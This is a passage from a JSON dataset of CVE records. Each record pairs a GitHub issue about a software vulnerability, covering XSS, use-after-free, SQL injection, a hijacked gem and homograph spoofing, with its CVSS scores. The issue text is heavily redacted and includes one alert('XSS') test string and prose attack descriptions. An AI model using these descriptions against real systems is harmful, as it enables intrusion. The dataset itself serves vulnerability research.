  37919. "baseScore": 6.1,
  37920. "impactScore": 2.7,
  37921. "exploitabilityScore": 2.8
  37922. },
  37923. {
  37924. "CVE_ID": "CVE-2019-15119",
  37925. "Issue_Url_old": "https://github.com/cnlh/nps/issues/176",
  37926. "Issue_Url_new": "https://github.com/ehang-io/nps/issues/176",
  37927. "Repo_new": "ehang-io/nps",
  37928. "Issue_Created_At": "2019-08-14T16:03:43Z",
  37929. "description": "Permission problems on NPS Install. Dear NPS, I would like to report a security vulnerability in NPS. There is a problem with file permission that allow regular access to write or access information that they are not supposed to. On the file install.go, the nps file is copied to PATHTAG or PATHTAG but then permission are changed to NUMBERTAG through a call to APITAG allowing every user to modify the binary. A potential attacker could replace the binary to something malicious and the next time a valid user run it, it will be executing the attacker's file. func APITAG { [...] if APITAG { if _, err := APITAG \"nps\"), PATHTAG ); err != nil { if _, err := APITAG \"nps\"), PATHTAG ); err != nil { APITAG } else { APITAG PATHTAG NUMBERTAG Wrong Permission set APITAG files have been copied to\", PATHTAG ) } } else { APITAG PATHTAG NUMBERTAG Wrong Permission set APITAG files have been copied to\", PATHTAG ) } Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
  37930. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  37931. "severity": "MEDIUM",
  37932. "baseScore": 5.5,
  37933. "impactScore": 3.6,
  37934. "exploitabilityScore": 1.8
  37935. },
  37936. {
  37937. "CVE_ID": "CVE-2019-15136",
  37938. "Issue_Url_old": "https://github.com/eProsima/Fast-RTPS/issues/443",
  37939. "Issue_Url_new": "https://github.com/eprosima/fast-dds/issues/443",
  37940. "Repo_new": "eprosima/fast-dds",
  37941. "Issue_Created_At": "2019-03-08T03:09:03Z",
  37942. "description": "Partition permission are not enforced for remote participants . Partition permissions are presently only checked when creating local data readers/writers, and are consequently skipped when checking remote readers/writers within the current default Access Control plugin implementation. This effectively nullifies any permission restrictions mandated in the remote participant's permission file, given it must be checked locally to ensure any access control policy is faithfully enforced. The flowing is a minimal example where only the partition permission checks for creating local data readers/writers are disabled for testing, while leaving the APITAG and APITAG fully intact. The secure publisher and subscriber are altered to connect over a common partition that is non existent in either of the participant's permissions, i.e. the only valid partition allowed by the permission policy is that of the empty string. Such altered fast rtps publisher and subscriber while successfully connect with each other, while consequently fail to connect to other secure dds implementation (that happen to properly provisioned with the sufficient partition permission). ERRORTAG I tried patching the APITAG APITAG classes to bubble up the necessary partition name context, thus allow for APITAG checks (presently absent) to be evokable in the APITAG and APITAG callbacks, however I have yet to have time to comb through layers of generic types and call sites to find where such a context (the partition name connecting the remote participant) could be passed along. As with URLTAG , this was uncovered during my development of a formal verification framework for the default DDS Security Access Control plugins and procedurally generated permission files.",
  37943. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  37944. "severity": "HIGH",
  37945. "baseScore": 7.5,
  37946. "impactScore": 3.6,
  37947. "exploitabilityScore": 3.9
  37948. },
  37949. {
  37950. "CVE_ID": "CVE-2019-15137",
  37951. "Issue_Url_old": "https://github.com/eProsima/Fast-RTPS/issues/441",
  37952. "Issue_Url_new": "https://github.com/eprosima/fast-dds/issues/441",
  37953. "Repo_new": "eprosima/fast-dds",
  37954. "Issue_Created_At": "2019-03-08T01:59:51Z",
  37955. "description": "Misuse of fnmatch used by DDS Security Access Control. The following two way fnmatch implementation allows for remote data readers/writers to use the topic name string as the expression to pattern match against its respective permissions: URLTAG This is counter to the OMG DDS Security specification for the default Access Control plugin, given that only the permission expressions themselves should be evaluated as the pattern when matching the POSIX fnmatch function. This can be illustrated by modifying the APITAG to communicate over the selected side channel APITAG without necessarily updating the provided permissions; that otherwise explicitly deny all topics excluding APITAG : CODETAG This issue seems to have persist from release NUMBERTAG URLTAG",
  37956. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  37957. "severity": "HIGH",
  37958. "baseScore": 7.5,
  37959. "impactScore": 3.6,
  37960. "exploitabilityScore": 3.9
  37961. },
  37962. {
  37963. "CVE_ID": "CVE-2019-15139",
  37964. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1553",
  37965. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1553",
  37966. "Repo_new": "imagemagick/imagemagick",
  37967. "Issue_Created_At": "2019-04-20T13:04:54Z",
  37968. "description": "APITAG Invalid read at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description When reading on XWD files APITAG may suffer from a crash caused by invalid memory read. Steps to Reproduce run APITAG or APITAG . A report from an APITAG copmiled APITAG is like this: ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: This was firstly detected when fuzzing APITAG POCs: FILETAG FILETAG Other information available here URLTAG .",
  37969. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37970. "severity": "MEDIUM",
  37971. "baseScore": 6.5,
  37972. "impactScore": 3.6,
  37973. "exploitabilityScore": 2.8
  37974. },
  37975. {
  37976. "CVE_ID": "CVE-2019-15140",
  37977. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1554",
  37978. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1554",
  37979. "Repo_new": "imagemagick/imagemagick",
  37980. "Issue_Created_At": "2019-04-27T07:14:42Z",
  37981. "description": "APITAG heap use after free at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG convert suffers from a heap use after free vulnerability. Steps to Reproduce run APITAG ERRORTAG POC files are available here URLTAG . System Configuration APITAG APITAG version NUMBERTAG Q NUMBERTAG a NUMBERTAG ae) Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information: It reports an assertion failure with regular debug mode compilation.",
  37982. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37983. "severity": "HIGH",
  37984. "baseScore": 8.8,
  37985. "impactScore": 5.9,
  37986. "exploitabilityScore": 2.8
  37987. },
  37988. {
  37989. "CVE_ID": "CVE-2019-15141",
  37990. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1560",
  37991. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1560",
  37992. "Repo_new": "imagemagick/imagemagick",
  37993. "Issue_Created_At": "2019-04-28T11:01:35Z",
  37994. "description": "APITAG heap buffer overflow at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ( URLTAG still suffers from heap buffer overflow error after with the patch that stresses URLTAG . Steps to Reproduce Run APITAG When linked with prebuilt libtiff.so from Ubuntu NUMBERTAG LTS NUMBERTAG APITAG reports: ERRORTAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG Additional information:",
  37995. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37996. "severity": "MEDIUM",
  37997. "baseScore": 6.5,
  37998. "impactScore": 3.6,
  37999. "exploitabilityScore": 2.8
  38000. },
  38001. {
  38002. "CVE_ID": "CVE-2019-15146",
  38003. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/60",
  38004. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/60",
  38005. "Repo_new": "gopro/gpmf-parser",
  38006. "Issue_Created_At": "2019-05-17T09:21:41Z",
  38007. "description": "Multiple crashes when parsing MP4 files. As of e NUMBERTAG b NUMBERTAG when running APITAG , it may report with crashes when building with APITAG Please see below for details.",
  38008. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38009. "severity": "MEDIUM",
  38010. "baseScore": 6.5,
  38011. "impactScore": 3.6,
  38012. "exploitabilityScore": 2.8
  38013. },
  38014. {
  38015. "CVE_ID": "CVE-2019-15151",
  38016. "Issue_Url_old": "https://github.com/adplug/adplug/issues/91",
  38017. "Issue_Url_new": "https://github.com/adplug/adplug/issues/91",
  38018. "Repo_new": "adplug/adplug",
  38019. "Issue_Created_At": "2019-08-09T07:51:21Z",
  38020. "description": "Double free in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a double free in in APITAG in src/u6m.h L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
  38021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38022. "severity": "CRITICAL",
  38023. "baseScore": 9.8,
  38024. "impactScore": 5.9,
  38025. "exploitabilityScore": 3.9
  38026. },
  38027. {
  38028. "CVE_ID": "CVE-2019-15160",
  38029. "Issue_Url_old": "https://github.com/kbrw/sweet_xml/issues/71",
  38030. "Issue_Url_new": "https://github.com/kbrw/sweet_xml/issues/71",
  38031. "Repo_new": "kbrw/sweet_xml",
  38032. "Issue_Created_At": "2019-03-30T16:30:34Z",
  38033. "description": "Inline DTD allows XML bomb attack. This is Wiki page for the vulnerability, it is a very well known XML parser vulnerability: URLTAG To replicate this issue in APITAG you can do the following in an iex session and watch in the observer: FILETAG NUMBERTAG minutes or so later, and it's still running! I was looking into xmerl a bit to see if there's a way to disable inline DTD when using xpath before opening this issue, but I'm not familiar enough with it yet. Hoping someone else may be able to chime in. The closest thing I could find was in the FILETAG there's an option to turn off external DTD parsing. That sounds like that wouldn't solve this issue though, because internal DTD is the problem.",
  38034. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38035. "severity": "HIGH",
  38036. "baseScore": 7.5,
  38037. "impactScore": 3.6,
  38038. "exploitabilityScore": 3.9
  38039. },
  38040. {
  38041. "CVE_ID": "CVE-2019-15224",
  38042. "Issue_Url_old": "https://github.com/rest-client/rest-client/issues/713",
  38043. "Issue_Url_new": "https://github.com/rest-client/rest-client/issues/713",
  38044. "Repo_new": "rest-client/rest-client",
  38045. "Issue_Created_At": "2019-08-19T10:45:06Z",
  38046. "description": "Warning! is rest client NUMBERTAG hijacked?. Hi, It seems that rest client NUMBERTAG is uploaded to APITAG I did review between NUMBERTAG and NUMBERTAG and it seems that latest version evaluate remote code from pastebin.com and sends information to APITAG request.rb: ERRORTAG code from APITAG ERRORTAG BR, Jussi",
  38047. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38048. "severity": "CRITICAL",
  38049. "baseScore": 9.8,
  38050. "impactScore": 5.9,
  38051. "exploitabilityScore": 3.9
  38052. },
  38053. {
  38054. "CVE_ID": "CVE-2019-15226",
  38055. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/8520",
  38056. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/8520",
  38057. "Repo_new": "envoyproxy/envoy",
  38058. "Issue_Created_At": "2019-10-07T19:46:57Z",
  38059. "description": "TBA for Security Release. WARNING: If you want to report crashes, leaking of sensitive information, and/or other security issues, please consider reporting them using appropriate channels URLTAG . Issue Template Title : One line description Description : APITAG the issue. Please be detailed. If a feature request, please describe the desired behaviour, what scenario it enables and how it would be used. FILETAG gathers a tarball with debug logs, config and the following admin endpoints: /stats, /clusters and /server_info. Please note if there are privacy concerns, sanitize the data prior to sharing the tarball/pasting. Admin and Stats Output : APITAG the admin output for the following endpoints: /stats, /clusters, /routes, /server_info. For more information, refer to the admin endpoint documentation. URLTAG > Note : If there are privacy concerns, sanitize the data prior to sharing. Config : APITAG the config used to configure Envoy. Logs : APITAG the access logs and the Envoy logs. > Note : If there are privacy concerns, sanitize the data prior to sharing. Call Stack : > If the Envoy binary is crashing, a call stack is required . Please refer to the Bazel Stack trace documentation URLTAG .",
  38060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38061. "severity": "HIGH",
  38062. "baseScore": 7.5,
  38063. "impactScore": 3.6,
  38064. "exploitabilityScore": 3.9
  38065. },
  38066. {
  38067. "CVE_ID": "CVE-2019-15228",
  38068. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/536",
  38069. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/536",
  38070. "Repo_new": "daylightstudio/fuel-cms",
  38071. "Issue_Created_At": "2019-08-17T17:52:01Z",
  38072. "description": "XSS and CSRF in Blocks. FILETAG FILETAG FILETAG FILETAG FILETAG",
  38073. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38074. "severity": "MEDIUM",
  38075. "baseScore": 5.4,
  38076. "impactScore": 2.7,
  38077. "exploitabilityScore": 2.3
  38078. },
  38079. {
  38080. "CVE_ID": "CVE-2019-15237",
  38081. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6891",
  38082. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6891",
  38083. "Repo_new": "roundcube/roundcubemail",
  38084. "Issue_Created_At": "2019-08-18T21:31:57Z",
  38085. "description": "IDN homograph attack when displaying e mail addresses.. Homograph attack is a security vulnerability that can deceive users into thinking they are visiting a certain website or the origin of an e mail when in fact it is a different, but homograph, domain name. This type of vulnerability can be used to weaponize social engineering, significantly increasing the chances for a successful attack. I have created a homograph of here.com using purely cyrillic characters PATHTAG (the punycode is xn APITAG I have other homographs, too, and registering them isn't a big deal. So I have sent an e mail from info APITAG c1adb NUMBERTAG c.com as SMTP, DNS, etc. only handle ASCII. However, for the sake of user friendliness, Roundcube will convert the domain name from ASCII to Unicode, without taking into consideration confusables. Therefore, the user will see the e mail as coming from EMAILTAG when in fact it came from another domain, xn APITAG In the case of APITAG the 'r' looks a bit off but this largerly depends on the display, system fonts, etc. Other confusables are completely visually indistinguishable. I have attached an example of an e mail coming from xn c1adb NUMBERTAG c.com when rendered in Roundcube. FILETAG Cheers, Julio",
  38086. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  38087. "severity": "HIGH",
  38088. "baseScore": 7.4,
  38089. "impactScore": 4.0,
  38090. "exploitabilityScore": 2.8
  38091. },
  38092. {
  38093. "CVE_ID": "CVE-2019-15325",
  38094. "Issue_Url_old": "https://github.com/GalliumOS/galliumos-distro/issues/514",
  38095. "Issue_Url_new": "https://github.com/galliumos/galliumos-distro/issues/514",
  38096. "Repo_new": "galliumos/galliumos-distro",
  38097. "Issue_Created_At": "2019-07-12T01:11:28Z",
  38098. "description": "Yama security module not enabled in kernel. Hello All, In experimenting with some of the newer kernels I have found that APITAG is disabled in APITAG This leads to the failure of APITAG which tries to set APITAG to NUMBERTAG We should either enable CONFIG_SECURITY_YAMA or disable NUMBERTAG APITAG Yama is enabled in the default Ubuntu NUMBERTAG with the intent of preventing a malicious attacker from attaching to running processes to examine them with tools like gdb and strace . For more information on this and a better description of the security reasons for enabling this, please see your kernel APITAG . My machine specs are ... APITAG Banon My firmware is essentially APITAG . (He helped me build my own firmware from his git tree.') My installation method was ISO. And to reproduce the problem build kernel NUMBERTAG and look at the dmesg output. The kernel can't set PATHTAG Chris",
  38099. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  38100. "severity": "HIGH",
  38101. "baseScore": 7.5,
  38102. "impactScore": 3.6,
  38103. "exploitabilityScore": 3.9
  38104. },
  38105. {
  38106. "CVE_ID": "CVE-2019-15480",
  38107. "Issue_Url_old": "https://github.com/domoticz/domoticz/issues/3367",
  38108. "Issue_Url_new": "https://github.com/domoticz/domoticz/issues/3367",
  38109. "Repo_new": "domoticz/domoticz",
  38110. "Issue_Created_At": "2019-07-01T08:17:03Z",
  38111. "description": "XSS Vulnerability in FILETAG . Description The FILETAG is vulnerable against XSS. By adding a scene with some scripts in the scene name will lead to a XSS. Obviously this is thankful for an attacker if he is privilege to adding or edit scenes. The attacker can execute arbitrary code. Affected Version Current release NUMBERTAG Steps to Reproduce NUMBERTAG Clone and compile it. I follow the instructions from the wiki: URLTAG NUMBERTAG Run domoticz APITAG NUMBERTAG Open APITAG in your browser NUMBERTAG Click button: Add Scene NUMBERTAG Have fun to implement arbitrary scripts or even test it with APITAG FILETAG Fix Some APITAG is used in the FILETAG , but this XSS is still present. Escaping the APITAG fix the XSS. Furthermore use APITAG instead of APITAG . The APITAG function was deprecated in APITAG NUMBERTAG FILETAG",
  38112. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38113. "severity": "MEDIUM",
  38114. "baseScore": 5.4,
  38115. "impactScore": 2.7,
  38116. "exploitabilityScore": 2.3
  38117. },
  38118. {
  38119. "CVE_ID": "CVE-2019-15499",
  38120. "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1263",
  38121. "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1263",
  38122. "Repo_new": "hackmdio/codimd",
  38123. "Issue_Created_At": "2019-08-21T10:09:07Z",
  38124. "description": "Open Redirect / XSS via iframe with sandbox.. Summary This is similar issue to NUMBERTAG but different cause. Due to sandbox attribute is allowed, attacker can redirect victim to something malicious if attacker embeds iframe with APITAG in sandbox attribute NUMBERTAG won't work in Chrome because of their security, but this will work due to sandbox is whitelist attribute. This will be XSS in Safari by using data scheme. Step to reproduce NUMBERTAG Type APITAG in Editor NUMBERTAG iew edited page. APITAG URLTAG APITAG APITAG will redirect you to FILETAG Suggested fix Don't allow sandbox attribute in PATHTAG",
  38125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38126. "severity": "MEDIUM",
  38127. "baseScore": 6.1,
  38128. "impactScore": 2.7,
  38129. "exploitabilityScore": 2.8
  38130. },
  38131. {
  38132. "CVE_ID": "CVE-2019-15507",
  38133. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5761",
  38134. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5761",
  38135. "Repo_new": "octopusdeploy/issues",
  38136. "Issue_Created_At": "2019-08-06T00:33:17Z",
  38137. "description": "Placeholder for NUMBERTAG master. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
  38138. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  38139. "severity": "MEDIUM",
  38140. "baseScore": 6.5,
  38141. "impactScore": 3.6,
  38142. "exploitabilityScore": 2.8
  38143. },
  38144. {
  38145. "CVE_ID": "CVE-2019-15508",
  38146. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5750",
  38147. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5750",
  38148. "Repo_new": "octopusdeploy/issues",
  38149. "Issue_Created_At": "2019-08-01T23:06:46Z",
  38150. "description": "Placeholder for NUMBERTAG master. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
  38151. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  38152. "severity": "MEDIUM",
  38153. "baseScore": 6.5,
  38154. "impactScore": 3.6,
  38155. "exploitabilityScore": 2.8
  38156. },
  38157. {
  38158. "CVE_ID": "CVE-2019-15532",
  38159. "Issue_Url_old": "https://github.com/gchq/CyberChef/issues/544",
  38160. "Issue_Url_new": "https://github.com/gchq/cyberchef/issues/544",
  38161. "Repo_new": "gchq/cyberchef",
  38162. "Issue_Created_At": "2019-04-23T17:01:56Z",
  38163. "description": "Bug report: Current release version does not include the recent XSS fix. Summary It looks like NUMBERTAG has been fixed in URLTAG but no release has been issued since the fix. Would it be possible to do a quick release APITAG to include the XSS fix? Thanks in advance for your consideration!",
  38164. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38165. "severity": "MEDIUM",
  38166. "baseScore": 6.1,
  38167. "impactScore": 2.7,
  38168. "exploitabilityScore": 2.8
  38169. },
  38170. {
  38171. "CVE_ID": "CVE-2019-15532",
  38172. "Issue_Url_old": "https://github.com/gchq/CyberChef/issues/539",
  38173. "Issue_Url_new": "https://github.com/gchq/cyberchef/issues/539",
  38174. "Repo_new": "gchq/cyberchef",
  38175. "Issue_Created_At": "2019-04-12T15:01:39Z",
  38176. "description": "Bug report: XSS with Encoding Brute Force. Summary While doing a CTF challenge, I was using cyber chef to encode a XSS javascript payload. When I put it through the text encoding brute force, alerts were displayed caused by the script. Example My input was APITAG alert('XSS') APITAG and when I added the brute force encoding multiple alerts popped up.",
  38177. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38178. "severity": "MEDIUM",
  38179. "baseScore": 6.1,
  38180. "impactScore": 2.7,
  38181. "exploitabilityScore": 2.8
  38182. },
  38183. {
  38184. "CVE_ID": "CVE-2019-15535",
  38185. "Issue_Url_old": "https://github.com/hotosm/tasking-manager/issues/1731",
  38186. "Issue_Url_new": "https://github.com/hotosm/tasking-manager/issues/1731",
  38187. "Repo_new": "hotosm/tasking-manager",
  38188. "Issue_Created_At": "2019-06-28T14:40:19Z",
  38189. "description": "Prevent SQL Injection when executing custom SQL. When using simple Python string formatting methods input values are not escaped which opens up the possibility of SQL injection attacks. For example: URLTAG APITAG provides a way to safely pass values to a custom SQL URLTAG",
  38190. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38191. "severity": "CRITICAL",
  38192. "baseScore": 9.8,
  38193. "impactScore": 5.9,
  38194. "exploitabilityScore": 3.9
  38195. },
  38196. {
  38197. "CVE_ID": "CVE-2019-15541",
  38198. "Issue_Url_old": "https://github.com/ctz/rustls/issues/285",
  38199. "Issue_Url_new": "https://github.com/rustls/rustls/issues/285",
  38200. "Repo_new": "rustls/rustls",
  38201. "Issue_Created_At": "2019-08-08T09:07:49Z",
  38202. "description": "bug in rustls mio. I have found the following situation: CODETAG The client is closed and the sever is trapped in loop of APITAG and ready function. URLTAG Maybe we should change the above code to CODETAG Thanks!",
  38203. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38204. "severity": "HIGH",
  38205. "baseScore": 7.5,
  38206. "impactScore": 3.6,
  38207. "exploitabilityScore": 3.9
  38208. },
  38209. {
  38210. "CVE_ID": "CVE-2019-15551",
  38211. "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/148",
  38212. "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/148",
  38213. "Repo_new": "servo/rust-smallvec",
  38214. "Issue_Created_At": "2019-06-06T15:13:23Z",
  38215. "description": "use after free when growing to the same size. Attempting to call grow on a spilled APITAG with a value equal to the current capacity causes it to free the existing data. CODETAG In the grow method URLTAG it falls through to deallocate. I believe something like the following is the fix: ERRORTAG",
  38216. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38217. "severity": "CRITICAL",
  38218. "baseScore": 9.8,
  38219. "impactScore": 5.9,
  38220. "exploitabilityScore": 3.9
  38221. },
  38222. {
  38223. "CVE_ID": "CVE-2019-15552",
  38224. "Issue_Url_old": "https://github.com/sile/libflate/issues/35",
  38225. "Issue_Url_new": "https://github.com/sile/libflate/issues/35",
  38226. "Repo_new": "sile/libflate",
  38227. "Issue_Created_At": "2019-06-26T01:28:22Z",
  38228. "description": "Use after free on panic in client code. If the code that uses libflate panics, it may trigger a use after free in libflate code. Since use after free usually poses an arbitrary code execution vulnerability, I will relay further details privately to the maintainer. Code compiled with APITAG is not affected. This can be used as a mitigation in the interim.",
  38229. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38230. "severity": "CRITICAL",
  38231. "baseScore": 9.8,
  38232. "impactScore": 5.9,
  38233. "exploitabilityScore": 3.9
  38234. },
  38235. {
  38236. "CVE_ID": "CVE-2019-15553",
  38237. "Issue_Url_old": "https://github.com/Gilnaa/memoffset/issues/9",
  38238. "Issue_Url_new": "https://github.com/gilnaa/memoffset/issues/9",
  38239. "Repo_new": "gilnaa/memoffset",
  38240. "Issue_Created_At": "2019-06-21T20:04:16Z",
  38241. "description": "APITAG is unsound. With the implementation in: ERRORTAG you are constructing a APITAG at address APITAG . This is undefined behavior because Rust may assume that you have a valid APITAG but you do not. Moreover, in the old pre NUMBERTAG implementation you have: ERRORTAG Note that when you say APITAG you have already triggered undefined behavior because again, you assert with APITAG that you have a valid reference but you do not in fact. See URLTAG and URLTAG for a discussion. As for your comment about ERRORTAG , do note that ERRORTAG here does not make what you are doing any less undefined behavior. Instead, while you might not get an error from the compiler, you might get miscompilation should LLVM or rustc's behavior change. cc APITAG",
  38242. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  38243. "severity": "HIGH",
  38244. "baseScore": 7.5,
  38245. "impactScore": 3.6,
  38246. "exploitabilityScore": 3.9
  38247. },
  38248. {
  38249. "CVE_ID": "CVE-2019-15554",
  38250. "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/149",
  38251. "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/149",
  38252. "Repo_new": "servo/rust-smallvec",
  38253. "Issue_Created_At": "2019-06-06T17:18:23Z",
  38254. "description": "Using grow to shrink can cause corruption.. If grow is given a size that is within the inline size after a APITAG has been spilled, the resulting value is corrupted. ERRORTAG This is admittedly unusual, most code would use APITAG . I think the following should fix it. ERRORTAG",
  38255. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38256. "severity": "CRITICAL",
  38257. "baseScore": 9.8,
  38258. "impactScore": 5.9,
  38259. "exploitabilityScore": 3.9
  38260. },
  38261. {
  38262. "CVE_ID": "CVE-2019-15587",
  38263. "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/171",
  38264. "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/171",
  38265. "Repo_new": "flavorjones/loofah",
  38266. "Issue_Created_At": "2019-10-09T19:30:48Z",
  38267. "description": "placeholder embargoes security vulnerability. This issue has been created for eventual public disclosure of a vulnerability in Loofah.",
  38268. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38269. "severity": "MEDIUM",
  38270. "baseScore": 5.4,
  38271. "impactScore": 2.7,
  38272. "exploitabilityScore": 2.3
  38273. },
  38274. {
  38275. "CVE_ID": "CVE-2019-15651",
  38276. "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2421",
  38277. "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2421",
  38278. "Repo_new": "wolfssl/wolfssl",
  38279. "Issue_Created_At": "2019-08-21T09:02:59Z",
  38280. "description": "one byte heap overread ( PATHTAG ). tested on APITAG NUMBERTAG ubuntu NUMBERTAG clang / asan Hi, I've came upon an one byte heap overread bug due to corner case mishandling in APITAG PATHTAG ), you could trigger it by loading attached DER certificate using API APITAG (or FILETAG ( FILETAG Corner cases: CODETAG If idx + length == APITAG which passed the check, it will trigger a buffer over read in ( PATHTAG ) CODETAG ASAN report ERRORTAG",
  38281. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38282. "severity": "CRITICAL",
  38283. "baseScore": 9.8,
  38284. "impactScore": 5.9,
  38285. "exploitabilityScore": 3.9
  38286. },
  38287. {
  38288. "CVE_ID": "CVE-2019-15698",
  38289. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5810",
  38290. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5810",
  38291. "Repo_new": "octopusdeploy/issues",
  38292. "Issue_Created_At": "2019-08-27T06:16:15Z",
  38293. "description": "Sensitive values may be exposed in some circumstances via variable preview. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description In certain circumstances, an authenticated user with APITAG permissions could view sensitive values via the improved variable preview shipped in APITAG Introduced in URLTAG Affected versions Octopus Server APITAG APITAG Mitigation Nothing great. Workarounds Upgrade to Octopus APITAG Limit users with APITAG permission Ensure all variables that reference a secure variable are themselves marked as sensitive Use subscriptions to track modifications to variables to audit access. Links Source: internally reported.",
